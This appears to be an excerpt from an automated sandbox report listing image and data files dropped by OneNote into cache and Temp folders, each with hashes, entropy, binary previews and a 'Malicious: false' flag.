SHA-256:	5B321A4D81BD499B289B1755F6450A42047C494DFBC112DBD56DA4CED2C15C1A
SHA-512:	C32DD26047F6B8AA061085B38AC2B8335868E1BFD8731DB65544309223A955FA4BF45B06AC8D244408658F51A1775B6F19FF0FFC804989DE706DE8EB36F1436F
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1..AQa..q..".........2...BR#b.r.3...$.'...)..C%7gw..(.S.W89.......................!1.A.Qa.q".....2...#....B.t......rc.$%67Rb3s&'CUu.v....S.d5.V4T.e.............?...?..Wj.e.e.......w/..E..eOw_.....6......u..C6h.,..;.g.D8Z..-)O..jy..e;.u.g..w..[.L""k'w.......'1'.[......=..P...S.9a.V./O....q=8xk]...........9......F...e9'....9.O.... .&.....p......c.4...mr...?.......L..'.....0....+..\|_...POM=7.?.2.a....};.Z..y./....>./.C.<...;.....\|.1>...........S.8.o.O...+..n2...k../.X..9...Y...:.....\...Dk......q.K..\.Wuh.!Z?.mu...R.5.A.S.h.0..[..v..+M.....aUi.k..?#..._...X..R.&]..[..;../]L..f..V.......e...ut&.#.J.5....c%..o.$..v.<K.6..T.IP.....6X.*.uf..t0^..-.)m$.!.q(.j.f;..WB6.b.B..R.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007B.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
Category:	dropped
Size (bytes):	22203
Entropy (8bit):	6.977175130747846
Encrypted:	false
SSDEEP:	192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
MD5:	2D3128554F6286809B2C8E99DE5FD3F6
SHA1:	FC42CB04151D36F448093BDEFE33031A9B8D797D
SHA-256:	14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
SHA-512:	D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
Malicious:	false
Preview:	......JFIF.....H.H.....XExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&..................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007D.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	15740
Entropy (8bit):	6.0674556182683945
Encrypted:	false
SSDEEP:	192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
MD5:	FFA5EC40DC9A0FD10EB9E6355142D6A6
SHA1:	3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
SHA-256:	D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
SHA-512:	6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.\|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007F.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	86187
Entropy (8bit):	7.951356272886186
Encrypted:	false
SSDEEP:	1536:AbmHwD7za0syWMetp3TdPFzoJamVdAQZCiUit9qbYN6LerhWMzIWgN1EeaYhJM:1QnzsyTeP3TPAdAQZCi5qbYEKrhWWMNO
MD5:	FEE4785DF76E93A9DC2F4501CBAEAE12
SHA1:	8FB4527BDE05EF208FCDB168098A07707C27501F
SHA-256:	F091DED5E283AF6848670A3172E7C43C6099875D39B3FC69C2BDBA914F609602
SHA-512:	7E99D33151A0D3873D6A819C98EA8E62D928C087B7BA2080F11C7BCF746AD60A44D4FF6EE3D2D2E8DFA4BF1FC6285ED56BB83F91C2FC6FC4FDFF2000105F10B1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................1.!Aq...Qa."...2..BR#...br......6v.7..3.CSc...$4.s..&dt%u.f.......................!1.AQ..aq........"2.B#....Rb3..t.5u.67.8.r..$....C4.cs.Sd%.DEUe&.............?............w.....c.....i.A.....3...7.......7..P......%.........?Th..l./?.;.....$}..=5Oa...F.c.A/...D.D..]..y..3e.5\%.fo2.X.]q.5Ee.}..i..md.T....#...-...Mu...9...-+..~w5O.);..G..'.;..).....A_...M.vV..y.q......,<.3.(...._K:..XM.......w.......9..T.......?b..a-%.c;.}..>....\|.,lZKCEB.t...fw\|.Sw^..Y..:.J.................t._P..v..j.1.R8.R....G..WH<(Xi........i..xcu...WM.dqM>'W..g....M.q.....+.....b'..~....>..T.~Jc....fj.X.x..9...N.w.6:..>.......&.(h..u...t._...)_k#7Za...cZ....P...Y..;.V.,..xo.....f........Y...\6...M'L._

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007H.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 85 x 470, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	11197
Entropy (8bit):	7.975073010774664
Encrypted:	false
SSDEEP:	192:p9wNdtRKcVHso6zsqm06xaqZdingVzLZ7/PGSIz/yycRTbChh/JzhbEx15RGb:mdtMcVHqgAqTinMzLZ7/uSIz/yTR/mhF
MD5:	DDC3CC30794277500EFE4BC6667EC123
SHA1:	EFC9642C1F95B5FC38764476AE481649C016FA0C
SHA-256:	7F5B660A1A0BF46C75AAF19B4F77A0E086DE003EC03AFC1F58D871D55AA5BA9E
SHA-512:	25232A84604C3959634D33090238FEC8D51E40AD84EB3A08BB8522A81BE1E83378649C014E98E1DFCDF46B7BFAC92D8D2429211CD11D7EE0334C9C3DF7C1B6A6
Malicious:	false
Preview:	.PNG........IHDR...U.........1x5.....PLTE....................................e........................................................s...............x..........................o..............................................................................................................................................................~.............................m...............................................j...............................................p.......z......................................................x..............\|........................................v.......................y..........................................................h...........................................................................P..{....bKGD....H....cmPPJCmp0712....H.s...(SIDATx^.}i@S..N....h...!..)....AI%..p.L."a..)..`U..,h..:O.b.:.j+.Z).b..zN.s..{O...&\|..N}...${....~.....k}.[k}{.o^.D_..W:35ly..7rL....6n0.A...b

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007J.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 88 x 574, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	19920
Entropy (8bit):	7.987696084459766
Encrypted:	false
SSDEEP:	384:DRSgtAxJx7bzvAsVSqQElOT4uHmpmvNYT9aPU+QtsC2LgfIqJZnbeyRB:DsgaN7bzvAsVdK4uGQFUZ6bU/p3
MD5:	1BDAD9B3B6DE549162F9567697389E1C
SHA1:	5D9C09159F07A3A9BDCC6C4B9BD9CB72D0184E6F
SHA-256:	0908A4CFA23F93011176D47F45843E9CA2973030421996E8E27484781F54B0EC
SHA-512:	475040779AC247BB5C3E11862FB55FBDDFA12D759EE86A33E11BC1F3B656D6CD0F9B25146C0113E43E1D8001D8867D3BC3BF7E6FE21F3A0016CB1F8B70B7A15A
Malicious:	false
Preview:	.PNG........IHDR...X...>......y=h....PLTE..................................t........iw..............................................._n\|...Tds...ky......................................................p~.....................................................dr.................v.............................................n{.......ap}..........x.....z...................u......................\|..Vfu............r.....w........................................~...................Zjx...................................Yiw............w..\|....................Xgv{.....y...........................jx..............\lz.........}..z.....t..[ky........u..y.....gu................................{..........}.....u....................~...........y....r.....bKGD....H....cmPPJCmp0712....H.s...JfIDATx^...\.W./.}....Sy...(..4....D.-.....H...% .$"D.Qr.......`..;...6...N......s...^...L.....Y{.GQU`..~...j....{...-Ax.K..&.....F..I\i..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007L.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	179460
Entropy (8bit):	7.979020171518325
Encrypted:	false
SSDEEP:	3072:oiKXvL7lv0am/R1vrdH+9dK6zPQ6bbnGDpcGGDNMIOIMAT8q9Vc02Q57S4A+vMFz:+vlvC/HvgA6fGqGGJlO1qZ71W6CzDn
MD5:	4E131DBFEC5C2462273CA7B35675B9D9
SHA1:	CA037F444D819A118AC37D7AA3782B9BF94C1616
SHA-256:	2A4A3530D652E227DDD5ADC096A95F6034718F7C380B07DB622022D768815059
SHA-512:	C333ECEB1439D0238BF44FB7896E62DBA4C645B70413AA0F99C1F10E8DCD20C2EEE5C83F2E9DDE9A2494C85A6D8D13CFFFC4160E2F598E17867015F5244D656A
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1AQ.aq...".....2Rr..Bb..#34.....CSs.$5c.t....%.Dd.6.T..u.U....E.7w........................!.1A.Qaq......2."r.3....BRb.#4......CsSc...$.5..%.DT.t67d..Uu...'............?..c.......p..z..i.....z......kj........F>f......3N...M....RM.&..-.~.Q..'.....q.a..w...-~......g.{..&.......V.n.D....>FS!n.....@..)...W..q..Wr{..J.gf.{.M$.P@m.,..9..&m.D...w.._...-.O........s.....h.k~......(.K...V..l.-...+.9.k............#.p#.O..9M..mF...C.......7+.AI....4vw.;..H......e..Q.u[.eUK.....z.....[.Kt...s..Lf.4..l{.....sh.............=..;..iqkj.m.a...NH......v..H..$..q.y......c...U[Mcf.......+...S-...^....4..T..YtL.x.v.;.....<...Ik\|B.$.s8......3.+.8.l.. h.:....%B..W..I.QRS..,x.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007N.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	109698
Entropy (8bit):	7.954100577911302
Encrypted:	false
SSDEEP:	3072:rDlmvIWr0aRtNCfShCWBxyCHMlcVG0Ezy4FR:rDliIfot8ahCWBcCHDVwR
MD5:	8D804A60E86627383BED6280ED62F1CF
SHA1:	E23FF14B10AD0762DD67FBA3CD6EFC85647C0384
SHA-256:	494547E566FB7A63DD429EB0699FE41AA8998F8EA2F758D813FE3D56C3075719
SHA-512:	0FB19F3D00159F2748C3A54E952E551B9FEA6910D67A54DECA8D099992E50383EADB92768FF1F75CFFAE82A7A157B1E0F77A2F0BE7EC64FD2324304FDCA46577
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...............................................................................................!"#.123..AQB$..aq.RCS...b..c4%..rs..D&....5E6'..TdUte...u.....FV...7.......................!"..1A2B..QaqR.#.br3.........C%...$5.....c4U..Eeu&SsD.6T..................?.....O.C.....^..R<A.g...[....3.....r.0.....nX.S....}...[.?Z.....A.?..~~I..rY\|N.o...9......!...o7r../-.y...'5.3.U.s".-.0.1......SS...&.Q.j.*.$m.e..:x....`}...EP.?.7..~G(so.......O.....z.N..<....~^a.e...........p9.?<._..\|......~.<@.D.9..G..?.?z.y?z.C.U.w..[.,..A.+........s......g...G.^....pz.xY.....d8.y.X...P..O(A.O..~:._.......<...o..4s..^.^b..x......_a.....\|{c...:..X.....}.._...[?..NK.c...}.<......H.G....+x.Z..\|....n...o....`.nk.#.%x......-\|...\|7......N!=././..w.8x.".8....'x........w...,>....j[w8a..}..lS..?.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007P.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	41893
Entropy (8bit):	7.52654558351485
Encrypted:	false
SSDEEP:	768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
MD5:	F25427EFECFEE786D5A9F630726DD140
SHA1:	BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
SHA-256:	5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
SHA-512:	B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[Fly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007S.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
Category:	dropped
Size (bytes):	68633
Entropy (8bit):	7.709776384921022
Encrypted:	false
SSDEEP:	1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
MD5:	41241EE59AB7BC9EB34784E3BCE31CB4
SHA1:	98680761A51E9199CF3C89F68B5309FBEC7EE3CB
SHA-256:	035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
SHA-512:	3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007U.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
Category:	dropped
Size (bytes):	59832
Entropy (8bit):	7.308211468398169
Encrypted:	false
SSDEEP:	1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
MD5:	DCDD543A4E0BA2C1909BA095D46FFBCB
SHA1:	B86C89537138FE07255354202D3EAD0B53B3C54D
SHA-256:	28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
SHA-512:	5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
Malicious:	false
Preview:	......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000080.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	modified
Size (bytes):	53259
Entropy (8bit):	7.651662052139301
Encrypted:	false
SSDEEP:	768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
MD5:	2EE369ABB7936F8C28FF0ABDD224EA05
SHA1:	FE9D304A7B49E31EAE439369ABC548E265149636
SHA-256:	FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
SHA-512:	5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}..a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{\|>..MN=:....Q[..H....a........\|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u....p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

C:\Users\user\AppData\Local\Temp\{03B0490D-A1FD-4935-A77D-322C8E102992}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
Category:	dropped
Size (bytes):	24268
Entropy (8bit):	6.946124661664625
Encrypted:	false
SSDEEP:	384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
MD5:	3CD906D179F59DDFA112510C7E996351
SHA1:	48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
SHA-256:	1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
SHA-512:	2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

C:\Users\user\AppData\Local\Temp\{077A17EC-E71B-4D5C-B441-250B0250517B}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Temp\{08325A61-6B8B-45A4-8498-F9398053E370}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1354
Entropy (8bit):	7.799120546917745
Encrypted:	false
SSDEEP:	24:AXFMpSCdmi2MTbWm/8T368Bf50D+1vDD9BFGBsQ5SOryjJ4w6++mPKc82UGOpIUg:AO4m122bQ36gfaS1rDw2QsOryjJ4xLml
MD5:	C2BF462C1311A92660999498F29394BD
SHA1:	4BD7C156F172C1114F33D80BAB05252C9F8E87C0
SHA-256:	5E0A8F7D863DAD057AC91FB888CFA7BE1D30A6CF65A908CE90081C323A0858B7
SHA-512:	1107117B3C4B843E5EB32CB13C5CA91E28857DDAE18A197F471D9FCA5B767C7441661FC3A21D2B6FF3C6EB91048A93598E1D86EA55A60A427D8E4B82E59A30C9
Malicious:	false
Preview:	.PNG........IHDR...(...(........m....sRGB.........pHYs...t...t..f.x....IDATXG..O.W....`...c.C..`.H(!@.[Q..B.D......Q..}.C...}.CTU.MR.j...[.....".x.B.x.wG.2$xf.J..W..g....}w.H.....b* ...../.V_\|.....TC]-.d......\\Z..l......>..D....G.....}.]}.x...X...WZ....?.-..A..&x...Q$)U..../.w...?..!8IE..:.....6..y.z..Yg.`g.@(...z...VS..$@..q2.,."....RT.}..%..q.lA0....[m.................2...8..a.LJ....n......M.%x......\...$g.Y.p.Q^U....$;.r.....>...>...]..$...r..bz.P.(....}:&'ldc...c\|.bs.>z.:?.M....(.SR..a..o..=2....i#..{......y.)....}.1_ .....T@O..F..d....Piu.TQA....#DY.S&G....j....3z..>zL..:...33...C&.S....h...LQk. ...hRSy&m..?...d.....l.].G...BL.-..N;.....s.0Q....T.(0...p....HU..d.V..z.)..2. ..........d...x.{......2.zdP.....;.?aeu......(..,#.....nj.... ....0.X..dr.T)x...4.V...]p8].p.PH.4f{.n.....x.........Z...O>DF.)^.Y.....p.Zf..1e.a.>."fm{.=hui...Fnn.T......./''...U<.,f'........:Y......ckk..RN.....f.omf..rZi.\..h.....\|.4.,/......=.z%.F....Z...>..A.....?.

C:\Users\user\AppData\Local\Temp\{08ADED65-52AF-48D0-A7FD-743FC187432E}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6450776458182587
Encrypted:	false
SSDEEP:	6:RamPurFYyfB3h1RRXUnfUOlVqtlOR2R2R2jKazVeaVYRujlw//0lweI/DaVARujd:RatYyf9/UfUdtPQQbVpV5Wf/+Vx
MD5:	74CBA472375BF7DEA7848878FF36BB0D
SHA1:	F4FDAC562116759F7D835791CA0D5B73E7443CAD
SHA-256:	A8E5101CF5F4788FA29EB4AA2B3CF965AFE274F35CDF972D55BCC1D4B7B29BFE
SHA-512:	9DBB73DFA064D495AFF7C0E4A9F3F9D607C65A70B7E41D8BA387B0A11E94629491CA8FA8B5E23F43EF00A103179A23AD945D1CA9DF7B49D75C650F669E99F585
Malicious:	false
Preview:	./.C..vL....W"v_H.K.v..G.......................?.....I...............................................................................................................h...........................................V.L...E."S+.ewb........~....H....&................................f.<.f.<.f.<.f.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{0978357C-E9F6-4E0A-A02F-A6D71EDBA96F}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	60924
Entropy (8bit):	7.758472758205366
Encrypted:	false
SSDEEP:	1536:kU7O7+CFqO6DkxTgPzo2wqggrrX8QvN1I/ZLBttB9+dPFXbc:hVuqJDaTqo2wq1L84N1I/Z1tT9X
MD5:	D58C51D2CF586A5E14A9EC8529C3B0A8
SHA1:	F4811A353797C29B1E3F5A61B125C46E1534D587
SHA-256:	F927C7825851974A2149868146970706523A49165133CEE6027A43E8C9ABDF27
SHA-512:	34B963173AFBDF07432F4B983D29F10376E4771FE666E9D50B1A81DA0B9F6001FD86B4A08B9711386DE153BF6E03C8E932E2D181C8EAF94EFF34D20FCA7570E0
Malicious:	false
